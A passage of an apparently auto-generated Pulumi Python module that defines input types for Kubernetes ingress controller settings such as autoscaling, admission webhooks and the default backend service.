        if scale_up is not None:
            pulumi.set(__self__, "scale_up", scale_up)

    @property
    @pulumi.getter(name="scaleDown")
    def scale_down(self) -> Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']]:
        return pulumi.get(self, "scale_down")

    @scale_down.setter
    def scale_down(self, value: Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']]):
        pulumi.set(self, "scale_down", value)

    @property
    @pulumi.getter(name="scaleUp")
    def scale_up(self) -> Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']]:
        return pulumi.get(self, "scale_up")

    @scale_up.setter
    def scale_up(self, value: Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']]):
        pulumi.set(self, "scale_up", value)
@pulumi.input_type
class AutoscalingTemplatePodsMetricArgs:
    """Generated input type: a pods metric referenced by name.
    Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None):
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class AutoscalingTemplatePodsTargetArgs:
    """Generated input type: a pods metric target (type and average value).
    Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 average_value: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        if average_value is not None:
            pulumi.set(__self__, "average_value", average_value)
        if type is not None:
            pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter(name="averageValue")
    def average_value(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "average_value")

    @average_value.setter
    def average_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "average_value", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class AutoscalingTemplatePodsArgs:
    """Generated input type: a pods metric/target pair.
    Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 metric: Optional[pulumi.Input['AutoscalingTemplatePodsMetricArgs']] = None,
                 target: Optional[pulumi.Input['AutoscalingTemplatePodsTargetArgs']] = None):
        if metric is not None:
            pulumi.set(__self__, "metric", metric)
        if target is not None:
            pulumi.set(__self__, "target", target)

    @property
    @pulumi.getter
    def metric(self) -> Optional[pulumi.Input['AutoscalingTemplatePodsMetricArgs']]:
        return pulumi.get(self, "metric")

    @metric.setter
    def metric(self, value: Optional[pulumi.Input['AutoscalingTemplatePodsMetricArgs']]):
        pulumi.set(self, "metric", value)

    @property
    @pulumi.getter
    def target(self) -> Optional[pulumi.Input['AutoscalingTemplatePodsTargetArgs']]:
        return pulumi.get(self, "target")

    @target.setter
    def target(self, value: Optional[pulumi.Input['AutoscalingTemplatePodsTargetArgs']]):
        pulumi.set(self, "target", value)
@pulumi.input_type
class AutoscalingTemplateArgs:
    """Generated input type: one autoscaling template entry (type + pods spec).
    Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 pods: Optional[pulumi.Input['AutoscalingTemplatePodsArgs']] = None,
                 type: Optional[pulumi.Input[str]] = None):
        if pods is not None:
            pulumi.set(__self__, "pods", pods)
        if type is not None:
            pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def pods(self) -> Optional[pulumi.Input['AutoscalingTemplatePodsArgs']]:
        return pulumi.get(self, "pods")

    @pods.setter
    def pods(self, value: Optional[pulumi.Input['AutoscalingTemplatePodsArgs']]):
        pulumi.set(self, "pods", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class AutoscalingArgs:
    """Generated input type: horizontal autoscaling settings (replica bounds,
    CPU/memory utilization targets, behavior, annotations).
    Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 controller_autoscaling_behavior: Optional[pulumi.Input['AutoscalingBehaviorArgs']] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 max_replicas: Optional[pulumi.Input[int]] = None,
                 min_replicas: Optional[pulumi.Input[int]] = None,
                 target_cpu_utilization_percentage: Optional[pulumi.Input[int]] = None,
                 target_memory_utilization_percentage: Optional[pulumi.Input[int]] = None):
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if controller_autoscaling_behavior is not None:
            pulumi.set(__self__, "controller_autoscaling_behavior", controller_autoscaling_behavior)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if max_replicas is not None:
            pulumi.set(__self__, "max_replicas", max_replicas)
        if min_replicas is not None:
            pulumi.set(__self__, "min_replicas", min_replicas)
        if target_cpu_utilization_percentage is not None:
            pulumi.set(__self__, "target_cpu_utilization_percentage", target_cpu_utilization_percentage)
        if target_memory_utilization_percentage is not None:
            pulumi.set(__self__, "target_memory_utilization_percentage", target_memory_utilization_percentage)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        return pulumi.get(self, "annotations")

    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "annotations", value)

    @property
    @pulumi.getter(name="controllerAutoscalingBehavior")
    def controller_autoscaling_behavior(self) -> Optional[pulumi.Input['AutoscalingBehaviorArgs']]:
        return pulumi.get(self, "controller_autoscaling_behavior")

    @controller_autoscaling_behavior.setter
    def controller_autoscaling_behavior(self, value: Optional[pulumi.Input['AutoscalingBehaviorArgs']]):
        pulumi.set(self, "controller_autoscaling_behavior", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="maxReplicas")
    def max_replicas(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "max_replicas")

    @max_replicas.setter
    def max_replicas(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_replicas", value)

    @property
    @pulumi.getter(name="minReplicas")
    def min_replicas(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "min_replicas")

    @min_replicas.setter
    def min_replicas(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_replicas", value)

    @property
    @pulumi.getter(name="targetCPUUtilizationPercentage")
    def target_cpu_utilization_percentage(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "target_cpu_utilization_percentage")

    @target_cpu_utilization_percentage.setter
    def target_cpu_utilization_percentage(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "target_cpu_utilization_percentage", value)

    @property
    @pulumi.getter(name="targetMemoryUtilizationPercentage")
    def target_memory_utilization_percentage(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "target_memory_utilization_percentage")

    @target_memory_utilization_percentage.setter
    def target_memory_utilization_percentage(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "target_memory_utilization_percentage", value)
@pulumi.input_type
class ContollerAdmissionWebhooksArgs:
    """Generated input type: admission-webhook configuration (certificate/key,
    selectors, patch jobs, service, timeouts).

    NOTE: the class name is misspelled ('Contoller') in the upstream schema
    and is kept as generated for compatibility.
    Pulumi-generated — do not edit by hand.
    """

    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 certificate: Optional[pulumi.Input[str]] = None,
                 create_secret_job: Optional[pulumi.Input['ControllerAdmissionWebhooksCreateSecretJobArgs']] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 existing_psp: Optional[pulumi.Input[str]] = None,
                 failure_policy: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 namespace_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 object_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 patch: Optional[pulumi.Input['ControllerAdmissionWebhooksPatchArgs']] = None,
                 patch_webhook_job: Optional[pulumi.Input['ControllerAdmissionWebhooksPatchWebhbookJobArgs']] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 service: Optional[pulumi.Input['ControllerAdmissionWebhooksServiceArgs']] = None,
                 timeout_seconds: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[str] existing_psp: Use an existing PSP instead of creating one.
        """
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if certificate is not None:
            pulumi.set(__self__, "certificate", certificate)
        if create_secret_job is not None:
            pulumi.set(__self__, "create_secret_job", create_secret_job)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if existing_psp is not None:
            pulumi.set(__self__, "existing_psp", existing_psp)
        if failure_policy is not None:
            pulumi.set(__self__, "failure_policy", failure_policy)
        if key is not None:
            pulumi.set(__self__, "key", key)
        if namespace_selector is not None:
            pulumi.set(__self__, "namespace_selector", namespace_selector)
        if object_selector is not None:
            pulumi.set(__self__, "object_selector", object_selector)
        if patch is not None:
            pulumi.set(__self__, "patch", patch)
        if patch_webhook_job is not None:
            pulumi.set(__self__, "patch_webhook_job", patch_webhook_job)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if service is not None:
            pulumi.set(__self__, "service", service)
        if timeout_seconds is not None:
            pulumi.set(__self__, "timeout_seconds", timeout_seconds)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        return pulumi.get(self, "annotations")

    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "annotations", value)

    @property
    @pulumi.getter
    def certificate(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "certificate")

    @certificate.setter
    def certificate(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "certificate", value)

    @property
    @pulumi.getter(name="createSecretJob")
    def create_secret_job(self) -> Optional[pulumi.Input['ControllerAdmissionWebhooksCreateSecretJobArgs']]:
        return pulumi.get(self, "create_secret_job")

    @create_secret_job.setter
    def create_secret_job(self, value: Optional[pulumi.Input['ControllerAdmissionWebhooksCreateSecretJobArgs']]):
        pulumi.set(self, "create_secret_job", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="existingPsp")
    def existing_psp(self) -> Optional[pulumi.Input[str]]:
        """
        Use an existing PSP instead of creating one.
        """
        return pulumi.get(self, "existing_psp")

    @existing_psp.setter
    def existing_psp(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "existing_psp", value)

    @property
    @pulumi.getter(name="failurePolicy")
    def failure_policy(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "failure_policy")

    @failure_policy.setter
    def failure_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "failure_policy", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter(name="namespaceSelector")
    def namespace_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        return pulumi.get(self, "namespace_selector")

    @namespace_selector.setter
    def namespace_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "namespace_selector", value)

    @property
    @pulumi.getter(name="objectSelector")
    def object_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        return pulumi.get(self, "object_selector")

    @object_selector.setter
    def object_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "object_selector", value)

    @property
    @pulumi.getter
    def patch(self) -> Optional[pulumi.Input['ControllerAdmissionWebhooksPatchArgs']]:
        return pulumi.get(self, "patch")

    @patch.setter
    def patch(self, value: Optional[pulumi.Input['ControllerAdmissionWebhooksPatchArgs']]):
        pulumi.set(self, "patch", value)

    @property
    @pulumi.getter(name="patchWebhookJob")
    def patch_webhook_job(self) -> Optional[pulumi.Input['ControllerAdmissionWebhooksPatchWebhbookJobArgs']]:
        return pulumi.get(self, "patch_webhook_job")

    @patch_webhook_job.setter
    def patch_webhook_job(self, value: Optional[pulumi.Input['ControllerAdmissionWebhooksPatchWebhbookJobArgs']]):
        pulumi.set(self, "patch_webhook_job", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter
    def service(self) -> Optional[pulumi.Input['ControllerAdmissionWebhooksServiceArgs']]:
        return pulumi.get(self, "service")

    @service.setter
    def service(self, value: Optional[pulumi.Input['ControllerAdmissionWebhooksServiceArgs']]):
        pulumi.set(self, "service", value)

    @property
    @pulumi.getter(name="timeoutSeconds")
    def timeout_seconds(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "timeout_seconds")

    @timeout_seconds.setter
    def timeout_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "timeout_seconds", value)
@pulumi.input_type
class ControllerAdmissionWebhooksCreateSecretJobArgs:
    """Generated input type: resource requirements for the secret-creation job.
    Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 resources: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']] = None):
        if resources is not None:
            pulumi.set(__self__, "resources", resources)

    @property
    @pulumi.getter
    def resources(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]:
        return pulumi.get(self, "resources")

    @resources.setter
    def resources(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]):
        pulumi.set(self, "resources", value)
@pulumi.input_type
class ControllerAdmissionWebhooksPatchWebhbookJobArgs:
    """Generated input type: resource requirements for the webhook-patch job.

    NOTE: 'Webhbook' is misspelled in the upstream schema; the name is kept
    as generated for compatibility. Pulumi-generated — do not edit by hand.
    """

    def __init__(__self__, *,
                 resources: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']] = None):
        if resources is not None:
            pulumi.set(__self__, "resources", resources)

    @property
    @pulumi.getter
    def resources(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]:
        return pulumi.get(self, "resources")

    @resources.setter
    def resources(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]):
        pulumi.set(self, "resources", value)
@pulumi.input_type
class ControllerAdmissionWebhooksPatchArgs:
    """Generated input type: settings for the admission-webhook patch job
    (image, scheduling, annotations, run-as user).
    Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 image: Optional[pulumi.Input['ControllerImageArgs']] = None,
                 node_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 pod_annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 priority_class_name: Optional[pulumi.Input[str]] = None,
                 run_as_user: Optional[pulumi.Input[int]] = None,
                 tolerations: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]] = None):
        """
        :param pulumi.Input[str] priority_class_name: Provide a priority class name to the webhook patching job.
        """
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if image is not None:
            pulumi.set(__self__, "image", image)
        if node_selector is not None:
            pulumi.set(__self__, "node_selector", node_selector)
        if pod_annotations is not None:
            pulumi.set(__self__, "pod_annotations", pod_annotations)
        if priority_class_name is not None:
            pulumi.set(__self__, "priority_class_name", priority_class_name)
        if run_as_user is not None:
            pulumi.set(__self__, "run_as_user", run_as_user)
        if tolerations is not None:
            pulumi.set(__self__, "tolerations", tolerations)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter
    def image(self) -> Optional[pulumi.Input['ControllerImageArgs']]:
        return pulumi.get(self, "image")

    @image.setter
    def image(self, value: Optional[pulumi.Input['ControllerImageArgs']]):
        pulumi.set(self, "image", value)

    @property
    @pulumi.getter(name="nodeSelector")
    def node_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        return pulumi.get(self, "node_selector")

    @node_selector.setter
    def node_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "node_selector", value)

    @property
    @pulumi.getter(name="podAnnotations")
    def pod_annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        return pulumi.get(self, "pod_annotations")

    @pod_annotations.setter
    def pod_annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "pod_annotations", value)

    @property
    @pulumi.getter(name="priorityClassName")
    def priority_class_name(self) -> Optional[pulumi.Input[str]]:
        """
        Provide a priority class name to the webhook patching job.
        """
        return pulumi.get(self, "priority_class_name")

    @priority_class_name.setter
    def priority_class_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "priority_class_name", value)

    @property
    @pulumi.getter(name="runAsUser")
    def run_as_user(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "run_as_user")

    @run_as_user.setter
    def run_as_user(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "run_as_user", value)

    @property
    @pulumi.getter
    def tolerations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]]:
        return pulumi.get(self, "tolerations")

    @tolerations.setter
    def tolerations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]]):
        pulumi.set(self, "tolerations", value)
@pulumi.input_type
class ControllerAdmissionWebhooksServiceArgs:
    """Generated input type: Kubernetes Service settings for the admission
    webhooks (IPs, port, type, annotations).
    Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 cluster_ip: Optional[pulumi.Input[str]] = None,
                 external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 load_balancer_ips: Optional[pulumi.Input[str]] = None,
                 load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 service_port: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if cluster_ip is not None:
            pulumi.set(__self__, "cluster_ip", cluster_ip)
        if external_ips is not None:
            pulumi.set(__self__, "external_ips", external_ips)
        if load_balancer_ips is not None:
            pulumi.set(__self__, "load_balancer_ips", load_balancer_ips)
        if load_balancer_source_ranges is not None:
            pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
        if service_port is not None:
            pulumi.set(__self__, "service_port", service_port)
        if type is not None:
            pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        return pulumi.get(self, "annotations")

    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "annotations", value)

    @property
    @pulumi.getter(name="clusterIP")
    def cluster_ip(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "cluster_ip")

    @cluster_ip.setter
    def cluster_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_ip", value)

    @property
    @pulumi.getter(name="externalIPs")
    def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "external_ips")

    @external_ips.setter
    def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "external_ips", value)

    @property
    @pulumi.getter(name="loadBalancerIPs")
    def load_balancer_ips(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "load_balancer_ips")

    @load_balancer_ips.setter
    def load_balancer_ips(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "load_balancer_ips", value)

    @property
    @pulumi.getter(name="loadBalancerSourceRanges")
    def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "load_balancer_source_ranges")

    @load_balancer_source_ranges.setter
    def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "load_balancer_source_ranges", value)

    @property
    @pulumi.getter(name="servicePort")
    def service_port(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "service_port")

    @service_port.setter
    def service_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "service_port", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerCustomTemplateArgs:
    """Generated input type: reference to a custom template stored in a
    ConfigMap (name + key). Pulumi-generated — do not edit by hand."""

    def __init__(__self__, *,
                 config_map_key: Optional[pulumi.Input[str]] = None,
                 config_map_name: Optional[pulumi.Input[str]] = None):
        if config_map_key is not None:
            pulumi.set(__self__, "config_map_key", config_map_key)
        if config_map_name is not None:
            pulumi.set(__self__, "config_map_name", config_map_name)

    @property
    @pulumi.getter(name="configMapKey")
    def config_map_key(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "config_map_key")

    @config_map_key.setter
    def config_map_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "config_map_key", value)

    @property
    @pulumi.getter(name="configMapName")
    def config_map_name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "config_map_name")

    @config_map_name.setter
    def config_map_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "config_map_name", value)
@pulumi.input_type
class ControllerDefaultBackendServiceArgs:
    """Pulumi input type for the default backend's Service-related fields.

    All fields are optional: ``annotations``, ``cluster_ip`` (wire name
    ``clusterIP``), ``external_ips`` (``externalIPs``), ``load_balancer_ip``
    (``loadBalancerIP``), ``load_balancer_source_ranges``
    (``loadBalancerSourceRanges``), ``service_port`` (``servicePort``)
    and ``type``.
    """
    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 cluster_ip: Optional[pulumi.Input[str]] = None,
                 external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 load_balancer_ip: Optional[pulumi.Input[str]] = None,
                 load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 service_port: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[Sequence[pulumi.Input[str]]] external_ips: List of IP addresses at which the default backend service is available. Ref: https://kubernetes.io/docs/user-guide/services/#external-ips
        """
        # Only explicitly supplied arguments are stored; unset fields stay
        # absent rather than being recorded as None.
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if cluster_ip is not None:
            pulumi.set(__self__, "cluster_ip", cluster_ip)
        if external_ips is not None:
            pulumi.set(__self__, "external_ips", external_ips)
        if load_balancer_ip is not None:
            pulumi.set(__self__, "load_balancer_ip", load_balancer_ip)
        if load_balancer_source_ranges is not None:
            pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
        if service_port is not None:
            pulumi.set(__self__, "service_port", service_port)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """The ``annotations`` mapping, if set."""
        return pulumi.get(self, "annotations")
    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "annotations", value)
    @property
    @pulumi.getter(name="clusterIP")
    def cluster_ip(self) -> Optional[pulumi.Input[str]]:
        """The ``clusterIP`` value, stored under ``cluster_ip``."""
        return pulumi.get(self, "cluster_ip")
    @cluster_ip.setter
    def cluster_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_ip", value)
    @property
    @pulumi.getter(name="externalIPs")
    def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        List of IP addresses at which the default backend service is available. Ref: https://kubernetes.io/docs/user-guide/services/#external-ips
        """
        return pulumi.get(self, "external_ips")
    @external_ips.setter
    def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "external_ips", value)
    @property
    @pulumi.getter(name="loadBalancerIP")
    def load_balancer_ip(self) -> Optional[pulumi.Input[str]]:
        """The ``loadBalancerIP`` value, stored under ``load_balancer_ip``."""
        return pulumi.get(self, "load_balancer_ip")
    @load_balancer_ip.setter
    def load_balancer_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "load_balancer_ip", value)
    @property
    @pulumi.getter(name="loadBalancerSourceRanges")
    def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """The ``loadBalancerSourceRanges`` list, stored under ``load_balancer_source_ranges``."""
        return pulumi.get(self, "load_balancer_source_ranges")
    @load_balancer_source_ranges.setter
    def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "load_balancer_source_ranges", value)
    @property
    @pulumi.getter(name="servicePort")
    def service_port(self) -> Optional[pulumi.Input[int]]:
        """The ``servicePort`` value, stored under ``service_port``."""
        return pulumi.get(self, "service_port")
    @service_port.setter
    def service_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "service_port", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """The ``type`` value, if set."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerDefaultBackendArgs:
    """Pulumi input type bundling the default backend's deployment settings.

    All fields are optional and mirror the property names below (affinity,
    autoscaling, enabled, existingPsp, extraArgs, extraEnvs,
    extraVolumeMounts, extraVolumes, image, livenessProbe, minAvailable,
    name, nodeSelector, podAnnotations, podLabels, podSecurityContext,
    port, priorityClassName, readinessProbe, replicaCount, resources,
    service, serviceAccount, tolerations).
    """
    def __init__(__self__, *,
                 affinity: Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']] = None,
                 autoscaling: Optional[pulumi.Input['AutoscalingArgs']] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 existing_psp: Optional[pulumi.Input[str]] = None,
                 extra_args: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 extra_envs: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]] = None,
                 extra_volume_mounts: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]] = None,
                 extra_volumes: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]] = None,
                 image: Optional[pulumi.Input['ControllerImageArgs']] = None,
                 liveness_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
                 min_available: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 node_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 pod_annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 pod_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 pod_security_context: Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 priority_class_name: Optional[pulumi.Input[str]] = None,
                 readiness_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
                 replica_count: Optional[pulumi.Input[int]] = None,
                 resources: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']] = None,
                 service: Optional[pulumi.Input['ControllerDefaultBackendServiceArgs']] = None,
                 service_account: Optional[pulumi.Input['ControllerServiceAccountArgs']] = None,
                 tolerations: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]] = None):
        """
